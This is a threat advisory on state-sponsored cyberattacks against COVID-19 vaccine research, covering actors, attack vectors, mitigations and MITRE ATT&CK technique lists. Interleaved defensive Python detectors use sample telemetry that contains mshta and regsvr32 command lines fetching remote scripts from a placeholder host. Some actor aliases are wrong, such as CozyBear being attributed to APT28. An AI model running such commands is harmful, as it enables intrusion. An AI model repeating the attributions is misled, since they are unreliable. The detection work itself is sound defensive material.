COVID-19 vaccine R&D under attack by state sponsored actors

Published on November 20, 2020 | 12:30 AM IST


Nation-state-sponsored actors are reportedly launching cyber offensives against COVID-19 vaccine research facilities across the globe, which are currently at various stages of vaccine development. The threat actors are reported to have had some success in establishing an initial foothold and even in exfiltrating research and other data.

Threat Actor Objectives

The involvement of nation-states in the ongoing cyber offensives can be attributed to the state of the world economy post-COVID-19. This has driven nation-states to compromise or acquire research data from foreign research entities in a bid to win the ‘vaccine race’, which would enable the rapid resurgence of their respective economies.

Threat Description

Threat actors are targeting individuals and organisations by direct methods such as password spraying, and by social engineering methods such as posing as WHO officials or job recruiters to induce victims to open malicious email attachments. They are also attacking Internet-facing assets by abusing weak RDP credentials to gain an initial foothold on the target network, from which they further the attack and compromise the target infrastructure.


Key Threat Actors

Threat Actor: APT28 (Russia)
  • Country of Origin: Russia
  • APT ID: APT 28
  • Alias/Group: FancyBear, CozyBear, Strontium, Sofacy

Threat Actor: Lazarus (North Korea)
  • Country of Origin: North Korea
  • APT ID: APT 38/37
  • Alias/Group: Lazarus Group, Zinc, HiddenCobra

Threat Actor: Cerium (North Korea)
  • Country of Origin: North Korea
  • APT ID: Not yet designated
  • Alias/Group: Cerium

Attack Vectors
  • Initial entry via password spraying and brute-force attacks to compromise valid user accounts
  • RDP credential compromise
  • Spear-phishing with malicious attachments
  • Phishing campaigns masquerading as job offerings
  • COVID-19 themed attacks
  • Spear-phishing posing as WHO officials
  • Emails laced with malicious attachments

Category: Advanced Persistent Threat (APT)
Target Sectors: Pharmaceutical (Vaccine R&D)
Target Regions: Canada, France, India, South Korea, United States

MITRE ATT&CK HEAT MAP

[Figure: MITRE ATT&CK heat map of the COVID-19 vaccine R&D attacks. Legend: Russian group; North Korean groups; common TTPs.]

Mitigation measures

Mitigation must be addressed not only by technical means but also by enforcing security policies that mandate those technical controls.


Mitigations to offset the risks associated with crucial stages in the cyber kill chain (phase: mitigation type):

  • Initial Access Phase: Administrative (Policy)
  • Payload Staging/Execution-Installation: Technical
  • Lateral Movement: Technical
  • Exfiltration/Objective: Administrative (Policy/Technical)


Initial Access Phase Mitigation

  • Administrative policy to enforce strong passwords: passwords should contain alphanumerics and special characters and should not contain dictionary words.
  • Account lockout policy: to prevent brute-forcing and password spraying.
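One way a SIEM rule could tell the two initial-access styles in this section apart, as an added example that is not part of the advisory; the failed-login record format, the window and the thresholds are assumptions. Spraying is the case lockout alone misses, because each account sees only a few attempts.

```python
"""Added example, not from the advisory: tell brute force (many attempts on one
account) from password spraying (one source, few attempts each across many
accounts, which stays under per-account lockout). Records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)
USERS = ["alice", "bob", "carol", "dave", "erin", "frank"]
# Constructed auth-failure records: "<ISO timestamp> <user> <source IP>".
SAMPLE_LOG = "\n".join(
    [f"2020-11-19T01:0{i}:00 {u} 203.0.113.7" for i, u in enumerate(USERS)]    # spray
    + [f"2020-11-19T01:{10 + i:02d}:00 admin 198.51.100.9" for i in range(12)]  # brute
    + ["2020-11-19T01:30:00 carol 192.0.2.5"]                                   # one typo
)

def parse_failures(log: str):
    """One failure per line -> list of (timestamp, user, source_ip)."""
    rows = []
    for line in log.splitlines():
        ts, user, ip = line.split()
        rows.append((datetime.fromisoformat(ts), user, ip))
    return rows

def classify(events, window=timedelta(minutes=30), spray_users=5,
             spray_max_per_user=3, brute_tries=10):
    """Group failures per (source IP, fixed time window) and label each group:
    brute = one account failed >= brute_tries times; spray = >= spray_users
    accounts with no account above spray_max_per_user. Returns
    {(ip, window_index): labels} for groups that matched."""
    per_window = defaultdict(lambda: defaultdict(int))
    for ts, user, ip in events:
        per_window[(ip, (ts - EPOCH) // window)][user] += 1
    verdicts = {}
    for key, per_user in per_window.items():
        labels, peak = set(), max(per_user.values())
        if peak >= brute_tries:
            labels.add("brute")
        if len(per_user) >= spray_users and peak <= spray_max_per_user:
            labels.add("spray")
        if labels:
            verdicts[key] = labels
    return verdicts

def alerts_by_ip(log: str = SAMPLE_LOG):
    """Collapse windows into {source_ip: labels} for reporting."""
    out = defaultdict(set)
    for (ip, _win), labels in classify(parse_failures(log)).items():
        out[ip] |= labels
    return dict(out)
```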

Payload Staging/ Execution-Installation Mitigation

  • Security administrators should be aware of the “Living-off-the-Land” approach of adversaries, that is, using trusted applications already present on the victim host to carry out the attacker's actions.
  • Effective log monitoring for suspicious activity, for example abnormal use of “mshta” and “regsvr32”.
  • Effective IDR/XDR solutions to monitor host activity.
  • Ingress/egress traffic flow monitoring.
  • Most of the outlined measures can be implemented with a SIEM.
  • System configuration auditing.
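An added example, not from the advisory, of the log-monitoring rule the second bullet describes: it scores process-creation events for abnormal mshta/regsvr32 use (remote or inline script arguments, or an Office parent). The Sysmon-style field names and the sample events are assumptions constructed for the example.

```python
"""Added example, not from the advisory: flag abnormal use of the trusted
Windows binaries mshta.exe and regsvr32.exe in process-creation telemetry.
Events use a Sysmon-style layout (Image, CommandLine, ParentImage, ProcessId)
and are constructed; hosts and paths are placeholders."""
import os

LOLBINS = {"mshta.exe", "regsvr32.exe"}
# Office parents should practically never launch a script host or DLL registrar.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command-line fragments that point to remote or inline script execution.
SUSPICIOUS_ARGS = ("http://", "https://", "scrobj.dll", "javascript:", "vbscript:", "/i:")

def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()

def inspect_event(event: dict):
    """Return the reasons an event looks abnormal (empty list = benign)."""
    image = _base(event["Image"])
    if image not in LOLBINS:
        return []
    reasons = []
    cmd = event["CommandLine"].lower()
    for frag in SUSPICIOUS_ARGS:
        if frag in cmd:
            reasons.append(f"{image} command line contains '{frag}'")
    parent = _base(event["ParentImage"])
    if parent in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office process {parent}")
    return reasons

def hunt(events):
    """Map ProcessId -> reasons for every event that tripped a rule."""
    return {e["ProcessId"]: r for e in events if (r := inspect_event(e))}

# Constructed telemetry: one legitimate registration by an installer, two abuses.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"ProcessId": 5188, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:https://example.test/a.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessId": 6012, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.test/update.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]
```

The installer-driven registration of a local DLL produces no reasons, which is the point of scoring context rather than alerting on every regsvr32 launch.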

Lateral Movement Mitigation

  • Proper user privilege auditing; use standard user accounts only for day-to-day work.
  • Enforcement of the “Principle of Least Privilege”.
  • Implementation of application allow-listing.
  • Multi-factor authentication.
  • Context-based and adaptive access controls.
  • Strong password policy.
  • Network segmentation and air-gapping.
  • Deploy threat-behaviour-model detection solutions such as modern IDR/XDR systems.
  • Awareness of tools commonly used by actors to execute lateral movement.


Exfiltration/Objective Mitigation

  • Effective DLP solutions to monitor border-router egress traffic.
  • Awareness of exfiltration techniques used by actors, for example exfiltration over DNS or HTTPS.
  • Attackers can use even trusted applications in the victim environment to exfiltrate data out of the target network (Living off the Land).

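An added example, not from the advisory, of detecting the DNS exfiltration technique named above in resolver query logs: per client and destination zone it looks for many unique subdomains whose leftmost label is long and high-entropy. The record format, the thresholds and the placeholder domains are assumptions.

```python
"""Added example, not from the advisory: spot DNS tunnelling in query logs by
looking, per client and destination zone, for many unique subdomains whose
leftmost label is long and high-entropy (encoded data chunks). Query records
are constructed and the domain names are placeholders."""
import hashlib
import math
from collections import defaultdict

def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    if not label:
        return 0.0
    freq = defaultdict(int)
    for ch in label:
        freq[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in freq.values())

def zone_of(qname: str) -> str:
    """Destination zone approximated as the last two labels (no PSL lookup)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def find_exfil(records, min_unique=15, min_len=30, min_entropy=3.0):
    """records: iterable of (client_ip, qname). Returns {(client, zone): stats}
    where the leftmost labels look like encoded payload rather than hostnames.
    A CDN with many short, low-entropy subdomains does not trip the rule."""
    seen = defaultdict(set)
    for client, qname in records:
        seen[(client, zone_of(qname))].add(qname.rstrip(".").split(".")[0])
    hits = {}
    for key, labels in seen.items():
        if len(labels) < min_unique:
            continue
        avg_len = sum(map(len, labels)) / len(labels)
        avg_ent = sum(map(label_entropy, labels)) / len(labels)
        if avg_len >= min_len and avg_ent >= min_entropy:
            hits[key] = {"unique": len(labels), "avg_len": round(avg_len, 1),
                         "avg_entropy": round(avg_ent, 2)}
    return hits

def sample_records():
    """Constructed log: one host leaking hex chunks, one host fetching from a CDN."""
    leak = [("10.0.0.8", hashlib.sha256(str(i).encode()).hexdigest()[:48]
             + ".t.exfil-example.test") for i in range(20)]
    cdn = [("10.0.0.9", f"img{i}.cdn-example.test") for i in range(20)]
    return leak + cdn
```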

Basic Incident Response Guidelines (guide: issuing body)

  • ISO/IEC 27035: ISO
  • ISO/IEC 27035-1: ISO
  • SP 800-61: NIST (US)


Appendix

APT28

Tactics, Techniques, and Procedures of APT28:

MITRE-ID  Description
T1134.001  Access Token Manipulation: Token Impersonation/Theft
T1583.001  Acquire Infrastructure: Domains
T1071.003  Application Layer Protocol: Mail Protocols
T1071.001  Application Layer Protocol: Web Protocols
T1560  Archive Collected Data
T1119  Automated Collection
T1037.001  Boot or Logon Initialization Scripts: Logon Script (Windows)
T1110.001  Brute Force: Password Guessing
T1110.003  Brute Force: Password Spraying
T1059.001  Command and Scripting Interpreter: PowerShell
T1059.003  Command and Scripting Interpreter: Windows Command Shell
T1092  Communication Through Removable Media
T1213.002  Data from Information Repositories: Sharepoint
T1005  Data from Local System
T1025  Data from Removable Media
T1001.001  Data Obfuscation: Junk Data
T1074.001  Data Staged: Local Data Staging
T1140  Deobfuscate/Decode Files or Information
T1114.002  Email Collection: Remote Email Collection
T1573.001  Encrypted Channel: Symmetric Cryptography
T1546.015  Event Triggered Execution: Component Object Model Hijacking
T1190  Exploit Public-Facing Application
T1203  Exploitation for Client Execution
T1211  Exploitation for Defense Evasion
T1068  Exploitation for Privilege Escalation
T1210  Exploitation of Remote Services
T1083  File and Directory Discovery
T1564.001  Hide Artifacts: Hidden Files and Directories
T1564.003  Hide Artifacts: Hidden Window
T1070.001  Indicator Removal on Host: Clear Windows Event Logs
T1070.004  Indicator Removal on Host: File Deletion
T1070.006  Indicator Removal on Host: Timestomp
T1105  Ingress Tool Transfer
T1056.001  Input Capture: Keylogging
T1559.002  Inter-Process Communication: Dynamic Data Exchange
T1498  Network Denial of Service
T1040  Network Sniffing
T1027  Obfuscated Files or Information
T1137.002  Office Application Startup: Office Test
T1003  OS Credential Dumping
T1003.001  OS Credential Dumping: LSASS Memory
T1120  Peripheral Device Discovery
T1566.001  Phishing: Spearphishing Attachment
T1566.002  Phishing: Spearphishing Link
T1542.003  Pre-OS Boot: Bootkit
T1057  Process Discovery
T1090.002  Proxy: External Proxy
T1091  Replication Through Removable Media
T1014  Rootkit
T1113  Screen Capture
T1218.011  Signed Binary Proxy Execution: Rundll32
T1528  Steal Application Access Token
T1221  Template Injection
T1199  Trusted Relationship
T1550.001  Use Alternate Authentication Material: Application Access Token
T1550.002  Use Alternate Authentication Material: Pass the Hash
T1204.002  User Execution: Malicious File
T1078  Valid Accounts

Software used by APT28:

MITRE-ID  Software
S0045  ADVSTORESHELL
S0351  Cannon
S0160  certutil
S0023  CHOPSTICK
S0137  CORESHELL
S0243  DealersChoice
S0134  Downdelph
S0502  Drovorub
S0193  Forfiles
S0410  Fysbis
S0135  HIDEDRV
S0044  JHUHUGIT
S0250  Koadic
S0162  Komplex
S0397  LoJax
S0002  Mimikatz
S0138  OLDBAIT
S0174  Responder
S0136  USBStealer
S0191  Winexe
S0314  X-Agent for Android
S0161  XAgentOSX
S0117  XTunnel
S0251  Zebrocy


Lazarus Group

Tactics, Techniques, and Procedures of Lazarus:

MITRE-ID  Description
T1134.002  Access Token Manipulation: Create Process with Token
T1098  Account Manipulation
T1071.001  Application Layer Protocol: Web Protocols
T1010  Application Window Discovery
T1560  Archive Collected Data
T1560.002  Archive Collected Data: Archive via Library
T1560.003  Archive Collected Data: Archive via Custom Method
T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1547.005  Boot or Logon Autostart Execution: Security Support Provider
T1547.009  Boot or Logon Autostart Execution: Shortcut Modification
T1110.003  Brute Force: Password Spraying
T1059.001  Command and Scripting Interpreter: PowerShell
T1059.005  Command and Scripting Interpreter: Visual Basic
T1059.003  Command and Scripting Interpreter: Windows Command Shell
T1543.003  Create or Modify System Process: Windows Service
T1485  Data Destruction
T1132.001  Data Encoding: Standard Encoding
T1005  Data from Local System
T1001.003  Data Obfuscation: Protocol Impersonation
T1074.001  Data Staged: Local Data Staging
T1491.001  Defacement: Internal Defacement
T1561.001  Disk Wipe: Disk Content Wipe
T1561.002  Disk Wipe: Disk Structure Wipe
T1189  Drive-by Compromise
T1573.001  Encrypted Channel: Symmetric Cryptography
T1048.003  Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1041  Exfiltration Over C2 Channel
T1203  Exploitation for Client Execution
T1008  Fallback Channels
T1083  File and Directory Discovery
T1564.001  Hide Artifacts: Hidden Files and Directories
T1562.004  Impair Defenses: Disable or Modify System Firewall
T1562.001  Impair Defenses: Disable or Modify Tools
T1070.004  Indicator Removal on Host: File Deletion
T1070.006  Indicator Removal on Host: Timestomp
T1105  Ingress Tool Transfer
T1056.001  Input Capture: Keylogging
T1036.004  Masquerading: Masquerade Task or Service
T1112  Modify Registry
T1571  Non-Standard Port
T1027  Obfuscated Files or Information
T1027.002  Obfuscated Files or Information: Software Packing
T1003.001  OS Credential Dumping: LSASS Memory
T1566.001  Phishing: Spearphishing Attachment
T1566.003  Phishing: Spearphishing via Service
T1542.003  Pre-OS Boot: Bootkit
T1057  Process Discovery
T1055.001  Process Injection: Dynamic-link Library Injection
T1090.002  Proxy: External Proxy
T1012  Query Registry
T1021.001  Remote Services: Remote Desktop Protocol
T1021.002  Remote Services: SMB/Windows Admin Shares
T1496  Resource Hijacking
T1489  Service Stop
T1218.001  Signed Binary Proxy Execution: Compiled HTML File
T1218.005  Signed Binary Proxy Execution: Mshta
T1082  System Information Discovery
T1016  System Network Configuration Discovery
T1033  System Owner/User Discovery
T1529  System Shutdown/Reboot
T1124  System Time Discovery
T1204.002  User Execution: Malicious File
T1047  Windows Management Instrumentation


Software used by Lazarus:

MITRE-ID  Software
S0347  AuditCred
S0245  BADCALL
S0239  Bankshot
S0498  Cryptoistic
S0497  Dacls
S0181  FALLCHILL
S0246  HARDRAIN
S0376  HOPLIGHT
S0431  HotCroissant
S0271  KEYMARBLE
S0002  Mimikatz
S0108  netsh
S0238  Proxysvc
S0241  RATANKBA
S0364  RawDisk
S0263  TYPEFRAME
S0180  Volgmer
S0366  WannaCry
